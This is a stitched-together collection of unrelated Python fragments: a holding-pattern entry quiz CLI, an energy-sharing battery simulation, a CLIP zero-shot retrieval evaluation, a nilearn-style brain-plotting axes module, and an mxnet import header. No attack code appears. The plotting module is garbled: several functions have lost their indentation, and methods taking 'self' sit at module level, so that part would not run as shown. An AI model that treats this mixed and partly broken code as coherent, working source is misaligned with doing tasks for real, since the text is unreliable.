            print(f'Choose entry method for holding on radial {holding_radial} with {turn.value} turn and arriving on course {inbound_course}.')
            for entry in Entries:
                print(f'  {entry.value} {entry.name}')
            try:
                answer = int(input('Your answer? '))
            except ValueError:
                print(80 * '=')
                print(f'Please enter a value of {valid_answers}')
                print(80 * '=')
        if answer == correct_answer.value:
            print('That is correct')
        else:
            print(f'That should have been {correct_answer.value}. {correct_answer.name}')
def calc(args):
    """Calculator mode: print the recommended entry for the given hold."""
    limits = get_parallel_limits(args.holding_radial, args.turn)
    entry = get_entry(args.holding_radial, args.turn, limits[0], limits[1], args.inbound)
    print(f'Use a {entry.name} entry')
def main():
    """CLI entry point: dispatch to the quiz or calc sub-command."""
    parser = ArgumentParser()
    subparsers = parser.add_subparsers()
    quiz_parser = subparsers.add_parser('quiz', help='Quiz mode')
    quiz_parser.add_argument('--questions', type=int, default=5, help='How many questions to ask')
    quiz_parser.set_defaults(func=quiz)
    calc_parser = subparsers.add_parser('calc', help='Calculator mode')
    calc_parser.add_argument('--inbound', type=int, required=True, help='Inbound course to the holding point')
    calc_parser.add_argument('--holding-radial', type=int, required=True, help='Hold radial as given by ATC or plate')
    calc_parser.add_argument('--turn', type=str, default=Turns.RIGHT.value, choices=[t.value for t in Turns], help='Turn direction (defaults to right)')
    calc_parser.set_defaults(func=calc)
    args = parser.parse_args()
    # Convert the CLI turn string into the Turns enum before dispatching.
    if hasattr(args, 'turn'):
        args.turn = Turns[args.turn.upper()]
    # When no sub-command is given, argparse leaves args.func unset; show
    # usage instead of crashing with AttributeError.
    if not hasattr(args, 'func'):
        parser.print_help()
        return
    args.func(args)
# Run the CLI when executed as a script.
if __name__ == '__main__':
    main()
|
# Custom modules
from network import Network
from participant import Participant, CSV_Participant
from battery import Battery, Central_Battery
from tariffs import Tariffs
import util
from results import Results
# Required 3rd party libraries
import datetime
import pandas as pd
import numpy as np
import pprint
import csv
import os
def simulate(time_periods, mynetwork, my_tariffs, results, status_callback=None):
    """Run the half-hourly energy-sharing simulation over ``time_periods``.

    For every period this: (1) records each participant's net export,
    (2) dispatches the central batteries, (3) allocates local solar (and
    battery discharge) to participants with load, (4) allocates local load
    (and battery charging) to participants with generation, then (5)
    derives per-participant grid import/export plus network-level gross
    totals.  All results are written into ``results``; nothing is returned.

    Note: ``my_tariffs`` is not referenced in this function -- presumably
    consumed by downstream financial calculations (verify with callers).
    """
    if status_callback:
        status_callback('Performing Energy Calculations: 0%')
    percent_finished = 0
    single_step_percent = 100.0 / float(len(time_periods))
    for time in time_periods:
        if status_callback:
            percent_finished += single_step_percent
            status_callback('Performing Energy Calculations: '+str(round(percent_finished))+"%")
        # print "Energy",time
        # Calc each participant in/out kWh
        for p in mynetwork.get_participants():
            results.set_net_export(time, p.get_id(), p.calc_net_export(time, 30))
        # Calc exces solar sharing / sales
        net_participant_export = mynetwork.calc_total_participant_export(time, 30)
        results.set_net_participant_export(time, net_participant_export)
        # Calc central battery in/out kWh
        central_battery_export = sum(b.make_export_decision(net_participant_export, time) for b in mynetwork.get_batteries())
        # central_battery_export = sum(b.make_export_decision(net_participant_export) for b in mynetwork.get_batteries())
        results.set_central_battery_export(time, central_battery_export)
        # Calc network in/out kWh
        results.set_net_network_export(time, net_participant_export + central_battery_export)
        # Run local solar allocation algorithm
        # Initialise an empty df with column name net_export
        participants_list_sorted = pd.DataFrame(columns=['net_export'])
        # Add net export data for participants with load
        for p in mynetwork.get_participants():
            # Get data point from df_net_export df
            net_export = results.get_net_export(time, p.get_id())
            # If there is load (i.e. export < 0 ) add to list
            if net_export < 0 :
                participants_list_sorted.loc[p.get_id(), 'net_export'] = net_export
        # Sort list of participants with load
        participants_list_sorted = participants_list_sorted.sort_values('net_export')
        # Calculate total solar available in this time period
        # Battery discharge (positive export) is available to share.
        available_batt = max(central_battery_export,0)
        available_solar = 0
        for participant in mynetwork.get_participants():
            net_export = results.get_net_export(time, participant.get_id())
            if net_export > 0 :
                available_solar += net_export
        # If there exist participants with load then allocate solar
        if len(participants_list_sorted) != 0 :
            # Calculate solar allocation - assume even split between participants with load
            num_remaining_participants = len(participants_list_sorted)
            solar_allocation = float(available_solar) / float(num_remaining_participants)
            battery_allocation = float(available_batt) / float(num_remaining_participants)
            # Initialise for use in second if statement
            reject_solar = 0
            # For each participant with load, find how much of their allocated solar is consumed and calculate the leftover ('reject solar')
            for p in participants_list_sorted.index.values :
                if solar_allocation > 0:
                    # Allocating solar
                    local_solar_import = min(abs(solar_allocation), abs(participants_list_sorted.loc[p, 'net_export']))
                    results.set_local_solar_import(time, p, local_solar_import)
                    # Find reject solar
                    reject_solar = solar_allocation - local_solar_import
                    # Find new available solar (based on what was used)
                    available_solar -= local_solar_import
                    # Decrement the number of remaining participants
                    num_remaining_participants -= 1
                    # Calculate the new solar allocation
                    solar_allocation = float(available_solar) / float(num_remaining_participants) if num_remaining_participants > 0 else 0
                # If the sale doesn't happen, then these things should be zero
                else :
                    reject_solar = 0
                    local_solar_import = 0
                # Allocate battery export when there is battery export and all solar has been used by this participant
                if battery_allocation > 0 and reject_solar <= 0 :
                    participant_net_export = participants_list_sorted.loc[p,'net_export']
                    participant_central_batt_import = min(abs(battery_allocation), abs(participant_net_export) - abs(local_solar_import))
                    results.set_participant_central_batt_import(time, p, participant_central_batt_import)
                    available_batt -= participant_central_batt_import
                    battery_allocation = float(available_batt) / float(num_remaining_participants) if num_remaining_participants > 0 else 0
        # Save any solar left over after the allocation process to df_network_energy_flows
        results.set_unallocated_local_solar(time, available_solar)
        # Run local load allocation algorithm (aka solar sales)
        # Initialise an empty df with column name net export
        solar_sales_participant_list = pd.DataFrame(columns = ['net_export'])
        # Add net export data for participants with generation
        for p in mynetwork.get_participants():
            # Get data point from df_net_export df
            net_export = results.get_net_export(time, p.get_id())
            # If there is generation (i.e. export > 0 ) add to list
            if net_export > 0 :
                solar_sales_participant_list.loc[p.get_id(), 'net_export'] = net_export
        # Sort list of participants with load
        solar_sales_participant_list = solar_sales_participant_list.sort_values('net_export')
        # Calculate total load available in this time period
        # TODO - central battery
        available_load = 0
        # Battery charging (negative export) is treated as extra local load.
        available_batt_charging_load = abs(min(central_battery_export,0))
        # # NOTE available load is positive
        # if net_export < 0 :
        #     available_load += abs(net_export)
        for participant in mynetwork.get_participants():
            net_export = results.get_net_export(time, participant.get_id())
            # NOTE available load is positive
            if net_export < 0 :
                available_load += abs(net_export)
        # If there exists participant with solar, allocate load
        if len(solar_sales_participant_list) != 0 :
            num_remaining_participants = len(solar_sales_participant_list)
            load_allocation = float(available_load) / float(num_remaining_participants)
            batt_charging_allocation = float(available_batt_charging_load) / float(num_remaining_participants)
            for p in solar_sales_participant_list.index.values :
                if load_allocation > 0:
                    participant_solar_sale = min(abs(load_allocation), abs(solar_sales_participant_list.loc[p,'net_export']))
                    results.set_local_solar_sales(time, p, participant_solar_sale)
                    reject_load = load_allocation - participant_solar_sale
                    available_load -= participant_solar_sale
                    num_remaining_participants -= 1
                    load_allocation = float(available_load) / float(num_remaining_participants) if num_remaining_participants > 0 else 0
                # If the sale doesn't happen, then these things should be zero
                else :
                    reject_load = 0
                    participant_solar_sale = 0
                if available_batt_charging_load > 0 and reject_load <= 0 :
                    participant_solar_sale = min(abs(batt_charging_allocation), abs(solar_sales_participant_list.loc[p,'net_export']) - abs(participant_solar_sale))
                    results.set_central_batt_solar_sales(time, p, participant_solar_sale)
                    available_batt_charging_load -= participant_solar_sale
                    batt_charging_allocation = float(available_batt_charging_load) / float(num_remaining_participants) if num_remaining_participants > 0 else 0
        # Grid impacts for each customer. Import from grid and solar export to grid.
        for p in mynetwork.get_participants():
            # First, solar export to grid
            net_export = results.get_net_export(time, p.get_id())
            local_solar_sales = results.get_local_solar_sales(time, p.get_id())
            central_battery_solar_sales = results.get_central_batt_solar_sales(time, p.get_id())
            # Calc and save to df
            export_to_grid_solar_sales = max(0,net_export) - max(0,local_solar_sales) - max(0,central_battery_solar_sales)
            results.set_export_to_grid_solar_sales(time, p.get_id(), export_to_grid_solar_sales)
            # Then, electricity import from grid
            local_solar_import = results.get_local_solar_import(time, p.get_id())
            participant_central_batt_import = results.get_participant_central_batt_import(time, p.get_id())
            # Left over load which requires grid import. Calc and save to df.
            external_grid_import = abs(min(net_export,0)) - abs(max(0,local_solar_import)) - abs(max(0,participant_central_batt_import))
            results.set_external_grid_elec_import(time, p.get_id(), external_grid_import)
        # Save any battery load left over after the allocation process to df_network_energy_flows
        results.set_unallocated_central_battery_load(time, available_batt_charging_load)
        # For the financial calcs for retailer/NSPs, calculate the gross grid import - i.e. how much did all the participants import during this time interval (only considers import - discards export). Also local solar and central battery import.
        results.set_gross_participant_grid_import(time, abs(min(results.get_net_participant_export(time),0)))
        results.set_gross_participant_local_solar_import(time, max( sum([results.get_local_solar_import(time, participant.get_id()) for participant in mynetwork.get_participants() ]) ,0))
        results.set_gross_participant_central_battery_import(time, max( sum( [results.get_participant_central_batt_import(time, participant.get_id()) for participant in mynetwork.get_participants()] ),0))
|
<filename>baselines/clip/zero_shot.py<gh_stars>1-10
# based on: https://github.com/haltakov/natural-language-image-search
from tqdm import tqdm
import json
from collections import defaultdict
from glob import glob
import os
import numpy as np
import clip
import torch
from PIL import Image
from pathlib import Path
import argparse
def encode_images(photos_batch):
    """Embed a batch of image files with CLIP.

    Returns the L2-normalised image features as a numpy array.
    """
    batch = torch.stack(
        [preprocess(Image.open(path)) for path in photos_batch]
    ).to(device)
    with torch.no_grad():
        features = model.encode_image(batch)
        features /= features.norm(dim=-1, keepdim=True)
    return features.cpu().numpy()
def encode_text(search_query):
    """Embed a text query with CLIP.

    Returns the L2-normalised text features as a numpy array.
    """
    with torch.no_grad():
        tokens = clip.tokenize(search_query, truncate=True).to(device)
        encoded = model.encode_text(tokens)
        encoded /= encoded.norm(dim=-1, keepdim=True)
    return encoded.cpu().numpy()
def find_best_matches(text_features, photo_features):
    """Rank photos against a text embedding by dot-product similarity.

    Returns a tuple of (photo indices ordered best-first, negated
    similarities sorted ascending, negated similarities in the original
    photo order).
    """
    neg_similarities = -(photo_features @ text_features.T).squeeze(1)
    ranking = np.argsort(neg_similarities)
    return ranking, np.sort(neg_similarities), neg_similarities
# --- Zero-shot CLIP retrieval evaluation (module-level script) ---
parser = argparse.ArgumentParser()
parser.add_argument('--descr_path', type=str, default='../../data/valid_data.json')
parser.add_argument('--imgs_path', type=str, default='/network/scratch/b/benno.krojer/dataset/games')
args = parser.parse_args()
clip_type = 'ViT-B/16'
device = "cuda" if torch.cuda.is_available() else "cpu"
print(f'USING DEVICE: {device}')
model, preprocess = clip.load(clip_type, device=device, jit=False) # Must set jit=False for training
# Accuracy counters: overall, and split by image source (open-images vs video).
correct = 0
total = 0
vid_correct = 0
vid_total = 0
img_correct = 0
img_total = 0
img_dirs = args.imgs_path
descriptions = json.load(open(args.descr_path, 'r'))
results = defaultdict(dict)
for img_dir, data in tqdm(descriptions.items()):
    for img_idx, text in data.items():
        img_files = list((Path(img_dirs) / img_dir).glob("*.jpg"))
        # Sort frames numerically by the digits after the 3-char filename
        # prefix (e.g. 'img12.jpg' -> 12) -- assumed naming scheme; verify.
        img_files = sorted(img_files, key=lambda x: int(str(x).split('/')[-1].split('.')[0][3:]))
        img_embs = encode_images(img_files)
        text_emb = encode_text(text.strip())
        ranked_idx, sim, unsorted_sims = find_best_matches(text_emb, img_embs)
        # Stem (filename without extension) of each candidate, best first.
        ranked_files = [str(img_files[rank]).split('/')[-1][:-4] for rank in ranked_idx]
        target = str(img_files[int(img_idx)]).split('/')[-1][:-4]
        total += 1
        results[img_dir].update({f'raw_preds_{img_idx}': unsorted_sims.tolist(), f'clip_pred_{img_idx}': int(ranked_idx[0]) ,f'correct_{img_idx}': 1 if ranked_files[0] == target else 0})
        if ranked_files[0] == target:
            correct += 1
        if 'open-images' in img_dir:
            img_total += 1
            if ranked_files[0] == target:
                img_correct += 1
        else:
            vid_total += 1
            if ranked_files[0] == target:
                vid_correct += 1
print('OVERALL ACC: ' + str(round(correct/total,4)))
print('VIDEO ACC: ' + str(round(vid_correct/vid_total,4)))
print('IMG ACC: ' + str(round(img_correct/img_total,4)))
json.dump(results, open(f'results/zero_clip_test.json', 'w'), indent=2)
|
import numbers
from nilearn._utils.docs import fill_doc
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.colors import Normalize
from matplotlib.patches import FancyArrow
from matplotlib.lines import Line2D
from matplotlib.font_manager import FontProperties
from mpl_toolkits.axes_grid1.anchored_artists import AnchoredSizeBar
from nilearn.image import coord_transform
from nilearn.plotting.glass_brain import plot_brain_schematics
@fill_doc
class BaseAxes(object):
    """An MPL axis-like object that displays a 2D view of 3D volumes.

    Parameters
    ----------
    %(ax)s
    direction : {'x', 'y', 'z'}
        The directions of the view.
    coord : :obj:`float`
        The coordinate along the direction of the cut.
    """
    def __init__(self, ax, direction, coord):
        self.ax = ax
        self.direction = direction
        self.coord = coord
        # Bounds (xmin, xmax, ymin, ymax) of every object drawn so far.
        self._object_bounds = list()
        # Shape of the last 2D view drawn; set by draw_2d.
        self.shape = None
    def transform_to_2d(self, data, affine):
        # Abstract: subclasses produce the 2D view (a cut or a projection).
        raise NotImplementedError("'transform_to_2d' needs to be implemented "
                                  "in derived classes'")
    def add_object_bounds(self, bounds):
        """Ensures that axes get rescaled when adding object bounds."""
        old_object_bounds = self.get_object_bounds()
        self._object_bounds.append(bounds)
        new_object_bounds = self.get_object_bounds()
        # Only touch the axis limits when the union of bounds changed.
        if new_object_bounds != old_object_bounds:
            self.ax.axis(self.get_object_bounds())
    def draw_2d(self, data_2d, data_bounds, bounding_box,
                type='imshow', **kwargs):
        """Draw a 2D view with the matplotlib Axes method named by
        ``type`` (default 'imshow') and return the artist it creates.

        ``data_bounds`` and ``bounding_box`` are (x, y, z) bound triplets;
        the two in-plane axes for this view are selected from them.
        """
        kwargs['origin'] = 'upper'
        # Select the two in-plane axes; the cut/projection axis is dropped.
        if self.direction == 'y':
            (xmin, xmax), (_, _), (zmin, zmax) = data_bounds
            (xmin_, xmax_), (_, _), (zmin_, zmax_) = bounding_box
        elif self.direction in 'xlr':
            (_, _), (xmin, xmax), (zmin, zmax) = data_bounds
            (_, _), (xmin_, xmax_), (zmin_, zmax_) = bounding_box
        elif self.direction == 'z':
            (xmin, xmax), (zmin, zmax), (_, _) = data_bounds
            (xmin_, xmax_), (zmin_, zmax_), (_, _) = bounding_box
        else:
            raise ValueError('Invalid value for direction %s' %
                             self.direction)
        ax = self.ax
        # Here we need to do a copy to avoid having the image changing as
        # we change the data
        im = getattr(ax, type)(data_2d.copy(),
                               extent=(xmin, xmax, zmin, zmax),
                               **kwargs)
        self.add_object_bounds((xmin_, xmax_, zmin_, zmax_))
        self.shape = data_2d.T.shape
        # The bounds of the object do not take into account a possible
        # inversion of the axis. As such, we check that the axis is properly
        # inverted when direction is left
        if self.direction == 'l' and not (ax.get_xlim()[0] > ax.get_xlim()[1]):
            ax.invert_xaxis()
        return im
    def get_object_bounds(self):
        """Return the bounds of the objects on this axes."""
        if len(self._object_bounds) == 0:
            # Nothing plotted yet
            return -.01, .01, -.01, .01
        xmins, xmaxs, ymins, ymaxs = np.array(self._object_bounds).T
        # Min/max over both columns so bounds stored in either order
        # (inverted axes) are handled.
        xmax = max(xmaxs.max(), xmins.max())
        xmin = min(xmins.min(), xmaxs.min())
        ymax = max(ymaxs.max(), ymins.max())
        ymin = min(ymins.min(), ymaxs.min())
        return xmin, xmax, ymin, ymax
    def draw_left_right(self, size, bg_color, **kwargs):
        """Draw the annotation "L" for left, and "R" for right.

        Parameters
        ----------
        size : :obj:`float`, optional
            Size of the text areas.
        bg_color : matplotlib color: :obj:`str` or (r, g, b) value
            The background color for both text areas.
        """
        # Sagittal views ('x', 'l', 'r') show one hemisphere; no annotation.
        if self.direction in 'xlr':
            return
        ax = self.ax
        ax.text(.1, .95, 'L',
                transform=ax.transAxes,
                horizontalalignment='left',
                verticalalignment='top',
                size=size,
                bbox=dict(boxstyle="square,pad=0",
                          ec=bg_color, fc=bg_color, alpha=1),
                **kwargs)
        ax.text(.9, .95, 'R',
                transform=ax.transAxes,
                horizontalalignment='right',
                verticalalignment='top',
                size=size,
                bbox=dict(boxstyle="square,pad=0", ec=bg_color, fc=bg_color),
                **kwargs)
    def draw_scale_bar(self, bg_color, size=5.0, units='cm',
                       fontproperties=None, frameon=False, loc=4, pad=.1,
                       borderpad=.5, sep=5, size_vertical=0, label_top=False,
                       color='black', fontsize=None, **kwargs):
        """Adds a scale bar annotation to the display.

        Parameters
        ----------
        bg_color : matplotlib color: :obj:`str` or (r, g, b) value
            The background color of the scale bar annotation.
        size : :obj:`float`, optional
            Horizontal length of the scale bar, given in `units`.
            Default=5.0.
        units : :obj:`str`, optional
            Physical units of the scale bar (`'cm'` or `'mm'`).
            Default='cm'.
        fontproperties : :class:`~matplotlib.font_manager.FontProperties`\
        or :obj:`dict`, optional
            Font properties for the label text.
        frameon : :obj:`bool`, optional
            Whether the scale bar is plotted with a border. Default=False.
        loc : :obj:`int`, optional
            Location of this scale bar. Valid location codes are documented
            `here <https://matplotlib.org/mpl_toolkits/axes_grid/\
api/anchored_artists_api.html#mpl_toolkits.axes_grid1.\
anchored_artists.AnchoredSizeBar>`__.
            Default=4.
        pad : :obj:`int` or :obj:`float`, optional
            Padding around the label and scale bar, in fraction of the font
            size. Default=0.1.
        borderpad : :obj:`int` or :obj:`float`, optional
            Border padding, in fraction of the font size. Default=0.5.
        sep : :obj:`int` or :obj:`float`, optional
            Separation between the label and the scale bar, in points.
            Default=5.
        size_vertical : :obj:`int` or :obj:`float`, optional
            Vertical length of the size bar, given in `units`.
            Default=0.
        label_top : :obj:`bool`, optional
            If ``True``, the label will be over the scale bar.
            Default=False.
        color : :obj:`str`, optional
            Color for the scale bar and label. Default='black'.
        fontsize : :obj:`int`, optional
            Label font size (overwrites the size passed in through the
            ``fontproperties`` argument).
        **kwargs :
            Keyworded arguments to pass to
            :class:`~matplotlib.offsetbox.AnchoredOffsetbox`.
        """
        axis = self.ax
        fontproperties = fontproperties or FontProperties()
        if fontsize:
            fontproperties.set_size(fontsize)
        # Axis data coordinates are millimetres (MNI space).
        width_mm = size
        if units == 'cm':
            width_mm *= 10
        anchor_size_bar = AnchoredSizeBar(
            axis.transData,
            width_mm,
            '%g%s' % (size, units),
            fontproperties=fontproperties,
            frameon=frameon,
            loc=loc,
            pad=pad,
            borderpad=borderpad,
            sep=sep,
            size_vertical=size_vertical,
            label_top=label_top,
            color=color,
            **kwargs)
        if frameon:
            anchor_size_bar.patch.set_facecolor(bg_color)
            anchor_size_bar.patch.set_edgecolor('none')
        axis.add_artist(anchor_size_bar)
    def draw_position(self, size, bg_color, **kwargs):
        """``draw_position`` is not implemented in base class and
        should be implemented in derived classes.
        """
        raise NotImplementedError("'draw_position' should be implemented "
                                  "in derived classes")
@fill_doc
class CutAxes(BaseAxes):
    """An MPL axis-like object that displays a cut of 3D volumes.

    Parameters
    ----------
    %(ax)s
    direction : {'x', 'y', 'z'}
        The directions of the view.
    coord : :obj:`float`
        The coordinate along the direction of the cut.
    """
    def transform_to_2d(self, data, affine):
        """Cut the 3D volume into a 2D slice.

        Parameters
        ----------
        data : 3D :class:`~numpy.ndarray`
            The 3D volume to cut.
        affine : 4x4 :class:`~numpy.ndarray`
            The affine of the volume.
        """
        coords = [0, 0, 0]
        if self.direction not in ['x', 'y', 'z']:
            raise ValueError('Invalid value for direction %s' %
                             self.direction)
        coords['xyz'.index(self.direction)] = self.coord
        # Map the world-space cut coordinate to voxel indices via the
        # inverse affine.
        x_map, y_map, z_map = [int(np.round(c)) for c in
                               coord_transform(coords[0],
                                               coords[1],
                                               coords[2],
                                               np.linalg.inv(affine))]
        # Rotate each slice so it is displayed in the expected orientation.
        if self.direction == 'y':
            cut = np.rot90(data[:, y_map, :])
        elif self.direction == 'x':
            cut = np.rot90(data[x_map, :, :])
        elif self.direction == 'z':
            cut = np.rot90(data[:, :, z_map])
        return cut
    def draw_position(self, size, bg_color, decimals=False, **kwargs):
        """Draw coordinates.

        Parameters
        ----------
        size : :obj:`float`, optional
            Size of the text area.
        bg_color : matplotlib color: :obj:`str` or (r, g, b) value
            The background color for text area.
        decimals : :obj:`bool` or :obj:`str`, optional
            Formatting string for the coordinates.
            If set to ``False``, integer formatting will be used.
            Default=False.
        """
        # NOTE(review): passing decimals=True (a bool) yields the malformed
        # format '%s=%.Truef'; callers appear to pass an int precision such
        # as 2 -- verify.
        if decimals:
            text = '%s=%.{}f'.format(decimals)
            coord = float(self.coord)
        else:
            text = '%s=%i'
            coord = self.coord
        ax = self.ax
        ax.text(0, 0, text % (self.direction, coord),
                transform=ax.transAxes,
                horizontalalignment='left',
                verticalalignment='bottom',
                size=size,
                bbox=dict(boxstyle="square,pad=0",
                          ec=bg_color, fc=bg_color, alpha=1),
                **kwargs)
def _get_index_from_direction(direction):
"""Returns numerical index from direction."""
directions = ['x', 'y', 'z']
try:
# l and r are subcases of x
if direction in 'lr':
index = 0
else:
index = directions.index(direction)
except ValueError:
message = (
'{0} is not a valid direction. '
"Allowed values are 'l', 'r', 'x', 'y' and 'z'").format(direction)
raise ValueError(message)
return index
def _coords_3d_to_2d(coords_3d, direction, return_direction=False):
    """Project 3d coordinates into 2d ones given the direction of a cut."""
    dropped = _get_index_from_direction(direction)
    # Keep the two axes orthogonal to the cut.
    kept = [axis for axis in (0, 1, 2) if axis != dropped]
    if return_direction:
        return coords_3d[:, kept], coords_3d[:, dropped]
    return coords_3d[:, kept]
@fill_doc
class GlassBrainAxes(BaseAxes):
"""An MPL axis-like object that displays a 2D projection of 3D
volumes with a schematic view of the brain.
Parameters
----------
%(ax)s
direction : {'x', 'y', 'z'}
The directions of the view.
coord : :obj:`float`
The coordinate along the direction of the cut.
plot_abs : :obj:`bool`, optional
If set to ``True`` the absolute value of the data will be considered.
Default=True.
"""
def __init__(self, ax, direction, coord, plot_abs=True, **kwargs):
super(GlassBrainAxes, self).__init__(ax, direction, coord)
self._plot_abs = plot_abs
if ax is not None:
object_bounds = plot_brain_schematics(ax, direction, **kwargs)
self.add_object_bounds(object_bounds)
    def transform_to_2d(self, data, affine):
        """Returns the maximum of the absolute value of the 3D volume
        along an axis.

        Parameters
        ----------
        data : 3D :class:`numpy.ndarray`
            The 3D volume.
        affine : 4x4 :class:`numpy.ndarray`
            The affine of the volume.
        """
        # Axis to project along: x (index 0) for sagittal views, else the
        # position of the direction letter in '.yz' (y -> 1, z -> 2).
        if self.direction in 'xlr':
            max_axis = 0
        else:
            max_axis = '.yz'.index(self.direction)
        # set unselected brain hemisphere activations to 0
        if self.direction == 'l':
            x_center, _, _, _ = np.dot(np.linalg.inv(affine),
                                       np.array([0, 0, 0, 1]))
            data_selection = data[:int(x_center), :, :]
        elif self.direction == 'r':
            x_center, _, _, _ = np.dot(np.linalg.inv(affine),
                                       np.array([0, 0, 0, 1]))
            data_selection = data[int(x_center):, :, :]
        else:
            data_selection = data
        # We need to make sure data_selection is not empty in the x axis
        # This should be the case since we expect images in MNI space
        if data_selection.shape[0] == 0:
            data_selection = data
        if not self._plot_abs:
            # get the shape of the array we are projecting to
            new_shape = list(data.shape)
            del new_shape[max_axis]
            # generate a 3D indexing array that points to max abs value in the
            # current projection
            a1, a2 = np.indices(new_shape)
            inds = [a1, a2]
            inds.insert(max_axis, np.abs(data_selection).argmax(axis=max_axis))
            # take the values where the absolute value of the projection
            # is the highest
            maximum_intensity_data = data_selection[tuple(inds)]
        else:
            maximum_intensity_data = np.abs(data_selection).max(axis=max_axis)
        # This work around can be removed bumping matplotlib > 2.1.0. See #1815
        # in nilearn for the invention of this work around
        if self.direction == 'l' and data_selection.min() is np.ma.masked and \
                not (self.ax.get_xlim()[0] > self.ax.get_xlim()[1]):
            self.ax.invert_xaxis()
        return np.rot90(maximum_intensity_data)
    def draw_position(self, size, bg_color, **kwargs):
        """Not implemented as it does not make sense to draw crosses for
        the position of the cuts since we are taking the max along one axis.
        """
        # Intentional no-op: a glass-brain view is a projection, not a cut.
        pass
def _add_markers(self, marker_coords, marker_color, marker_size, **kwargs):
"""Plot markers.
In the case of 'l' and 'r' directions (for hemispheric projections),
markers in the coordinate x == 0 are included in both hemispheres.
"""
marker_coords_2d = _coords_3d_to_2d(marker_coords, self.direction)
xdata, ydata = marker_coords_2d.T
# Allow markers only in their respective hemisphere when appropriate
if self.direction in 'lr':
if not isinstance(marker_color, str) and \
not isinstance(marker_color, np.ndarray):
marker_color = np.asarray(marker_color)
relevant_coords = []
xcoords, ycoords, zcoords = marker_coords.T
for cidx, xc in enumerate(xcoords):
if self.direction == 'r' and xc >= 0:
relevant_coords.append(cidx)
elif self.direction == 'l' and xc <= 0:
relevant_coords.append(cidx)
xdata = xdata[relevant_coords]
ydata = ydata[relevant_coords]
# if marker_color is string for example 'red' or 'blue', then
# we pass marker_color as it is to matplotlib scatter without
# making any selection in 'l' or 'r' color.
# More likely that user wants to display all nodes to be in
# same color.
if not isinstance(marker_color, str) and \
len(marker_color) != 1:
marker_color = marker_color[relevant_coords]
if not isinstance(marker_size, numbers.Number):
marker_size = np.asarray(marker_size)[relevant_coords]
defaults = {'marker': 'o',
'zorder': 1000}
for k, v in defaults.items():
kwargs.setdefault(k, v)
self.ax.scatter(xdata, ydata, s=marker_size,
c=marker_color, **kwargs)
def _add_lines(self, line_coords, line_values, cmap,
               vmin=None, vmax=None, directed=False, **kwargs):
    """Plot lines

    Parameters
    ----------
    line_coords : :obj:`list` of :class:`numpy.ndarray` of shape (2, 3)
        3D coordinates of lines start points and end points.

    line_values : array_like
        Values of the lines.

    cmap : :class:`~matplotlib.colors.Colormap`
        Colormap used to map ``line_values`` to a color.

    vmin, vmax : :obj:`float`, optional
        If not ``None``, either or both of these values will be used to
        as the minimum and maximum values to color lines. If ``None`` are
        supplied the maximum absolute value within the given threshold
        will be used as minimum (multiplied by -1) and maximum
        coloring levels.

    directed : :obj:`bool`, optional
        Add arrows instead of lines if set to ``True``.
        Use this when plotting directed graphs for example.
        Default=False.

    kwargs : :obj:`dict`
        Additional arguments to pass to :class:`~matplotlib.lines.Line2D`.
    """
    # colormap for colorbar
    self.cmap = cmap
    # Derive missing color limits; when both are absent, use a symmetric
    # range around zero based on the largest absolute value.
    if vmin is None and vmax is None:
        abs_line_values_max = np.abs(line_values).max()
        vmin = -abs_line_values_max
        vmax = abs_line_values_max
    elif vmin is None:
        if vmax > 0:
            vmin = -vmax
        else:
            raise ValueError(
                "If vmax is set to a non-positive number "
                "then vmin needs to be specified"
            )
    elif vmax is None:
        if vmin < 0:
            vmax = -vmin
        else:
            raise ValueError(
                "If vmin is set to a non-negative number "
                "then vmax needs to be specified"
            )
    norm = Normalize(vmin=vmin, vmax=vmax)
    # normalization useful for colorbar
    self.norm = norm
    # Separate [0, vmax] normalization used only for linewidth/zorder.
    abs_norm = Normalize(vmin=0, vmax=vmax)
    value_to_color = plt.cm.ScalarMappable(norm=norm, cmap=cmap).to_rgba

    # Allow lines only in their respective hemisphere when appropriate.
    # NOTE(review): 'r' keeps endpoints with x >= 0, but 'l' requires
    # strictly x < 0, so a line touching x == 0 appears only on 'r' —
    # confirm this asymmetry is intended.
    if self.direction in 'lr':
        relevant_lines = []
        for lidx, line in enumerate(line_coords):
            if self.direction == 'r':
                if line[0, 0] >= 0 and line[1, 0] >= 0:
                    relevant_lines.append(lidx)
            elif self.direction == 'l':
                if line[0, 0] < 0 and line[1, 0] < 0:
                    relevant_lines.append(lidx)
        line_coords = np.array(line_coords)[relevant_lines]
        line_values = line_values[relevant_lines]

    for start_end_point_3d, line_value in zip(
            line_coords, line_values):
        start_end_point_2d = _coords_3d_to_2d(start_end_point_3d,
                                              self.direction)

        color = value_to_color(line_value)
        abs_line_value = abs(line_value)
        linewidth = 1 + 2 * abs_norm(abs_line_value)
        # Hacky way to put the strongest connections on top of the weakest
        # note sign does not matter hence using 'abs'
        zorder = 10 + 10 * abs_norm(abs_line_value)
        this_kwargs = {'color': color, 'linewidth': linewidth,
                       'zorder': zorder}
        # kwargs should have priority over this_kwargs so that the
        # user can override the default logic
        this_kwargs.update(kwargs)
        xdata, ydata = start_end_point_2d.T
        # If directed is True, add an arrow
        if directed:
            dx = xdata[1] - xdata[0]
            dy = ydata[1] - ydata[0]
            # Hack to avoid empty arrows to crash with
            # matplotlib versions older than 3.1
            # This can be removed once support for
            # matplotlib pre 3.1 has been dropped.
            if dx == 0 and dy == 0:
                # NOTE(review): this degenerate branch drops this_kwargs,
                # so color/linewidth/zorder are not applied — confirm.
                arrow = FancyArrow(xdata[0], ydata[0],
                                   dx, dy)
            else:
                arrow = FancyArrow(xdata[0], ydata[0],
                                   dx, dy,
                                   length_includes_head=True,
                                   width=linewidth,
                                   head_width=3 * linewidth,
                                   **this_kwargs)
            self.ax.add_patch(arrow)
        # Otherwise a line
        else:
            line = Line2D(xdata, ydata, **this_kwargs)
            self.ax.add_line(line)
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import json
import os
import sys
from collections import namedtuple
from datetime import datetime
from config_util import parse_args, parse_contexts, generate_file_path
from train import do_training
import mxnet as mx
from stt_io_iter import STTIter
from label_util import LabelUtil
from log_util import LogUtil
import numpy as np
